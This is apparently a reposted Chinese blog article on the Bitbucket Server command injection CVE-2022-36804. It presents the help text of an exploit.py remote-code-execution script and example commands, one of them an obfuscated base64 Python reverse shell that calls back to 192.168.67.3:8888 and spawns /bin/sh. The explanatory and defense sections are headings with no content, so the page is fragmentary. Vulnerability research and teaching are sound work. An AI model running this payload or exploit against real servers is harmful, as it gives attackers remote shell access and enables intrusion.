Bitbucket Server 命令注入漏洞简述
Bitbucket Server 命令注入漏洞利用原理
Bitbucket Server 命令注入漏洞POC
usage: exploit.py [-h] -p PROJECT -r REPO -u URL [-c COMMAND] [--proxy PROXY] [--session SESSION] [--check]Exploits the CVE-2022-36804 RCE in vulnerable BitBucket instances (< v8.3.1)optional arguments:-h, --help show this help message and exit-p PROJECT, --project PROJECTThe name of the project the public repository resides in (E.g. testproject)-r REPO, --repo REPO The name of the public repository (E.g. testrepo)-u URL, --url URL The URL of the BitBucket server (E.g. http://localhost:7990/)-c COMMAND, --command COMMANDThe command to execute on the server (E.g. 'curl http://canary.domain/')--proxy PROXY HTTP proxy to use for debugging (E.g. http://localhost:8080/)--session SESSION The value of your 'BITBUCKETSESSIONID' cookie, required if your target repo is private. (E.g. 3DD8B1EBA3763AD2611F4940BD870865)--check Only perform a check to see if the instance is vulnerable
python3 exploit.py -p PROJECT -r REPO -u http://target.site/ --checkpython3 exploit.py -p PROJECT -r REPO -u http://localhost:7990/ -c "echo 'cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC42Ny4zIiw4ODg4KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7cHR5LnNwYXduKCIvYmluL3NoIikn' | base64 -d | bash |"Bitbucket Server 命令注入漏洞防御方式
原文始发于微信公众号(w小小杂谈w):漏洞科普——Bitbucket Server 命令注入漏洞(CVE-2022-36804)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论